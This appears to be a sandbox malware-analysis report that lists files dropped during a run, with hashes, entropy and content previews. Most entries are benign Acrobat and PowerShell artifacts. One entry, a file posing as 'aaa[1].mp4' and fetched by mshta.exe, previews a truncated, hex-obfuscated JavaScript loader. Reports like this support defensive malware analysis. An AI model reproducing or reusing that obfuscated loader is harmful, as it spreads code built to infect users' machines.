                                                        SHA-256:0041C2DBFBBF74F31CC72760B60A242A5B0F55600A7B7A1323EC695622854E34
                                                        SHA-512:41255DC34206BF81AC7952DAF6D818B879854499E59F0D9C76F4DF8F67265CF31343FC4470BF4CE86CF5E91F7EC864E11F27DF1723AA5FD6B24E63E6D2869127
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.27103241875915
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfYdPeUkwRe9:YvXKXx+TQmyU1UTbdiGg8Ukee9
                                                        MD5:45EDF5B933AC26B49746A3EF4D718F62
                                                        SHA1:96269296DA84CBD5925D5B3232191E26A0CD1DEB
                                                        SHA-256:BBD0F079C7B4E45060B0B76B1ED91DF9A9E732E752B9CE9F88564B8C2642C940
                                                        SHA-512:0B8DCBFCC1698A25B78E1A211E78336908EE7AD288C0578312E81B39F1D68878E97D0C0CB2D91E8F3F5F178492C72EA311304E7A90BE1D071EC06A2A6A3A80AB
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):284
                                                        Entropy (8bit):5.256255097421502
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJf+dPeUkwRe9:YvXKXx+TQmyU1UTbdiG28Ukee9
                                                        MD5:EDDD59760EEE06A279898ABF1D284B8E
                                                        SHA1:75B6E399901FD498EFF6967DD3F826608196F39E
                                                        SHA-256:12E08E2AD9B20F339ABA7176563DB0729D9EA99446A7504CC9C3BD3E3F6FB350
                                                        SHA-512:423E106704856F3582C7BD8228B93C1DBF2DE19EA2CDDCC7BC39FD211EE7C6094471019BC619D559CBF6EC1F89AC71D1F3871B75C9DF943A8A5A723BB99D61A1
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):291
                                                        Entropy (8bit):5.254778606338449
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfbPtdPeUkwRe9:YvXKXx+TQmyU1UTbdiGDV8Ukee9
                                                        MD5:44BED773EEBDC07843527C82A2CBE3C0
                                                        SHA1:6ACEEB109F2933398271663E7C998B958D8F3506
                                                        SHA-256:26978FCBD143D299542279E168D6E9CC80A94DB3876D9DC8805ABCF1E384FE8B
                                                        SHA-512:7923DD3EC5E2A3D20A6DD9C797DA10E0C7778199D8012453B897F9ED49406196D3D1A85383B403020CB4DA132D02C8BC1161F894B45911EC64F75D12A7A4A9CB
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):287
                                                        Entropy (8bit):5.258054837655887
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJf21rPeUkwRe9:YvXKXx+TQmyU1UTbdiG+16Ukee9
                                                        MD5:217D8C424E8C1F9B2A4EBD920E358C4F
                                                        SHA1:C782410AE6D904018AA8839866BA58AA4377E79F
                                                        SHA-256:6C21E4A25426B7E23EEF85798BD5723309E647E5EE5813743E42ABFDBF5F55FD
                                                        SHA-512:1527C10CAD47F1F6CE340484675DD9B75B67540E16C4999D7C6C123DB873834021A088AA8BE9C79E0A3A698DBE5DBF275963FA5DA3E76E2AFFCF80F6D84B0C95
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1090
                                                        Entropy (8bit):5.655251195936669
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xx+TQmyCUXpamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSO:Yv0W7Vw1BgkDMUJUAh8cvMO
                                                        MD5:9C50DE23EA7D885DA6C98AE8E8FC68E8
                                                        SHA1:2580A8F81BCFA1A11F94E271A4E4117190F8C701
                                                        SHA-256:C5812018EA45A2712DBE9D6077BCAA0B8AEFC3D1C8C7F3EC52B6F582C48C94E2
                                                        SHA-512:EB931B0106E93A7902974E8E54DBDD08E71556C2755B461A62472FE226621FFDD719104A12B6FA7A8F7F8F6AF134FB051AE977BD575E896D9F9A3F4BB68880DE
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):286
                                                        Entropy (8bit):5.23369721951234
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJfshHHrPeUkwRe9:YvXKXx+TQmyU1UTbdiGUUUkee9
                                                        MD5:58C626C0111CAED9E6A296F698B20AAC
                                                        SHA1:C6B11AB08C2C03DFEF264343B6C1CD25E77130B1
                                                        SHA-256:B9C926DA4A9CE29D87C03B9C5CA893E7FCDF50B0C8BE6330A514C05B395A70AA
                                                        SHA-512:2FAEED844E2A6CE40916211D50B66435C0B2FED10E418BD2B1DB59E9A6679D73378053CC320E684CE7285A3152FACE9AC2B55A14E15A17417D996F7C57A16C13
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):282
                                                        Entropy (8bit):5.239257108698361
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXssVUTQI1PqU1UXjb24kF0YpUoAvJTqgFCrPeUkwRe9:YvXKXx+TQmyU1UTbdiGTq16Ukee9
                                                        MD5:CA2601C2812297D91B52F1DC4804E57E
                                                        SHA1:E289F90F9F5CD112DE65DF4D2030F30A70CEA44B
                                                        SHA-256:C5FFC0A8EE09D05B5AD54B523DFC6996120234A1DF5EE563D8FD05D03FB6AAEF
                                                        SHA-512:AA6242E4A2BF70F33509767BE125C2593E6C4BD4CC515803676B20ED6763AF9CFCA93BAF082C94E9A5E7D4FC257C8BF0B986009E7C136F6A3BD789179DD3846E
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"9402cd12-0111-4b75-bb9a-0a41263c391a","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1735459381063,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):0.8112781244591328
                                                        Encrypted:false
                                                        SSDEEP:3:e:e
                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                        Malicious:false
                                                        Preview:....

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2814
                                                        Entropy (8bit):5.141813283752691
                                                        Encrypted:false
                                                        SSDEEP:24:YyJ6aIUp7Tay8CPHzqEKGxKEAplnDI+jLj0SKUsY4/S2x2LSkC0FA6pR5FYEu81L:YtUxRTLKGYEOXnBsPKEizFA6TrLugh9T
                                                        MD5:1F1E7B3801A479CE7F5B3C3512837E26
                                                        SHA1:6BF89F59B1E7B1D328A343BDA33E73F75F104CE6
                                                        SHA-256:18F9B3E5EC12D8A9DDEF69482AA07889741928743533054FC257BCDBD731480E
                                                        SHA-512:D933021EE1A9AAFE3F4E0AF96001C410D0D88DA66DE7EF4555FCA45D2B7805B143A7FB09EC10E66E0576944CEF1BA3E457C2CE2B16B87FEC6FE3BC0977ADF723
                                                        Malicious:false
                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"c4a6c1b6626e68c52f7b25e9b98bd3ed","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735285680000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"798ccbc641eb0a150249ad39ef1f662f","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735285680000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"3742916b9b5427049c17ebd71cdd9c20","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735285680000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"730ed77b54d5c2f514d097c587e34b7e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735285680000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e018697985d559c490d2c08421b94fa8","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735285680000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"5b2ad65b64f092d0b6d0a116aa312470","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):1.3199179711576665
                                                        Encrypted:false
                                                        SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6YeoGJQFL+E4:TGufl2GL7msUKB0M0+Tb608YZsrhz
                                                        MD5:DF5D20BFF686F19AF25320253350D5AB
                                                        SHA1:F1FA88F13643851910210F90AA37CBE8456CC888
                                                        SHA-256:20B70CA1C6CE23E55B36C9D0D533C3756B7EDA36E571C80110F9336F3A18C844
                                                        SHA-512:CC10D2030EF5233E7BECCCED3D3BBEF60DD5F02AC7DB8B8FA4DF15A1B78AB7AC96FB9B8730A11BA28979A0694434972420D6B6E2F6F4927A2D12BD55AA0E414B
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):1.7821383929031762
                                                        Encrypted:false
                                                        SSDEEP:48:7MbUKB0M0+Tb608YZBrGKKcqFl2GL7msK:7sFb608YZHKcKVmsK
                                                        MD5:9E6CB202DB21A1EFAC6B1183492BC2E2
                                                        SHA1:D1D6D78A8D44BD3EF97F10EDEBB27C33078206F8
                                                        SHA-256:F3149650C2D9F04167267BF567BC90118B63533CA6B6E8FE280078A7B318183D
                                                        SHA-512:4A205AF478079EC2B73F7E12B3487E351A11677285A3CAEBB63021C50B946BE8B385221E3E257D6F5D3DCB30E70C5B85356E8622A2568EC4D33423BFE0C96178
                                                        Malicious:false
                                                        Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66726
                                                        Entropy (8bit):5.392739213842091
                                                        Encrypted:false
                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEg/xCSaGogDoiVwR4sAM4a0UglYyu:6a6TZ44ADE/MGjDoiV6TglK
                                                        MD5:86CD68D6081340D7B1CA34C7690FE315
                                                        SHA1:8944A42AB7FA4463040B2BE53F72A83DD0B4CFED
                                                        SHA-256:88D5ED4758529FC5EE8A1B64520A9B6D8273C6888B6DB169509230F693FD473C
                                                        SHA-512:2336B48528A467B5FEDAC758D0EDAE971DBE05DD711AC45EAC0897B9716CC93FE02E5C35C05ECE53A5D960D43DA670E93966D6BB51BECC9222711FE6CB8ADE0D
                                                        Malicious:false
                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\aaa[1].mp4

                                                        Download File
                                                        Process:C:\Windows\System32\mshta.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):497355
                                                        Entropy (8bit):6.2697576364001515
                                                        Encrypted:false
                                                        SSDEEP:6144:YUT2/hKdAxeNSYneIelFeYU3+ejQdefeFdAepSjUbeXeTkeMe/:v0hKq
                                                        MD5:CB3ECBABD5A956664E03CBE4270418C6
                                                        SHA1:6B7915B233B5E30C8B6ACA23013735A9F33DDA3F
                                                        SHA-256:9355A7BC59AF4AB0AE04ABE2EAE7984BCEDE654F5E46302686F381E678D20615
                                                        SHA-512:53AEEB6F6AF1BF767FF6C303DB786B91BA0B4A8F8DFCAFF44935FE8F5642D594ACA39BBC8229B8971C033A158BFE0880541CA158EEB88BF29BE2CCE1AAA0947C
                                                        Malicious:false
                                                        Preview:66T75e6eF63b74B69A6fg6eU20a69L68f71E4cV6eb28G76p71R73M55p43c29r7bz76i61Q72D20V50a4eT72N65K6fT79l3dD20h27t27N3bZ66M6fx72l20y28v76c61P72P20m6cX65s51v43f61F20K3dk20H30q3bU6cv65p51X43f61Z20M3cH20P76r71t73A55n43h2et6cP65E6eO67E74e68v3bW20T6cA65Q51y43h61Y2bh2bF29I7bB76w61q72Z20R56k58o58R5aL6bm68o20N3dX20V53m74j72L69B6eP67B2ew66g72d6fu6dx43c68o61H72h43r6fn64Z65K28j76s71D73x55I43c5bf6cP65w51s43s61H5dI20v2df20e39O32W31X29S3bD50M4eV72T65v6fb79o20v3dh20k50U4ey72O65D6fn79d20i2bm20D56Y58k58l5az6bo68l7dn72o65g74J75c72S6eU20Q50H4eG72X65X6fk79B7dg3bo76j61h72M20X50t4es72F65I6fC79v20c3dT20y69h68S71N4ch6ei28I5bn31H30m33F33R2cA31h30H33w32Q2cF31y30l34W30k2cA31E30m32Q32r2cu31i30Y33H35h2cq31A30R33Z36o2cJ31p30B32s35t2cg31x30c32v32X2cL31l30I32r39w2cx31r30x32O39h2cN39a36Q37r2cN31E30j32e32Y2ca31z30Q34h31I2cG31P30w32s32d2cE39D35b33r2ct39f36J36a2ch31L30j34z30D2cD39s35a33j2cZ39K37e30p2cx39S35E33U2cX39v36D36A2ck31g30A32y32T2cJ31d30m33j33X2cL39E35d33B2cT31o30b30v36M2co31i30X33q31l2cN31o30H33k35W2cX31V30j32F32Z2cw31f3

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):11887
                                                        Entropy (8bit):4.901437212034066
                                                        Encrypted:false
                                                        SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sY:Srib4ZoopbjvwRjdvRNkjh4iUxsNYW6m
                                                        MD5:DDAC12D6036E986FE7B5A5E062A8CC14
                                                        SHA1:FA891410075C9E647754E894CDCB14751FE9E3C7
                                                        SHA-256:B3B4B4AF761334818B7924740A84E55CE8ECA480F13077854469E8D9C7C1DF7E
                                                        SHA-512:F7BD65E3B361D0F02B541273A6D99BD1F6B438F2304D4F061C262164166E4FAB6F56614CFD1C44A0D99C9E1A1B46D5DF0138A4656F96B7390162F54E1679B776
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Temp\MSI5ce70.LOG

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):246
                                                        Entropy (8bit):3.5004142083842487
                                                        Encrypted:false
                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87/G:Qw946cPbiOxDlbYnuRKF
                                                        MD5:80EB66D70CC7C0FBA6F95AF773144C26
                                                        SHA1:96864BEED0A7960851FDD226C7885F5DA8E573CD
                                                        SHA-256:42349F4AAC6CAA219FCCDF74A26548BFDD265466DC7769E1D573F7188D82ECE3
                                                        SHA-512:8F668BCC82246023C220D10541CC34F9320CBDB9742035C3C6A175A23BF2DFDDCCF5515E20334FB110372DED17A7F0A749F858683BDD55A92A68F953998DC7C7
                                                        Malicious:false
                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.2./.2.0.2.4. . .0.2.:.4.7.:.5.7. .=.=.=.....

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4ddl3hi.1oo.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bi3equd1.oqt.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwav1ubt.rpx.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_js2yoj1b.sre.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryptaput.sz5.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
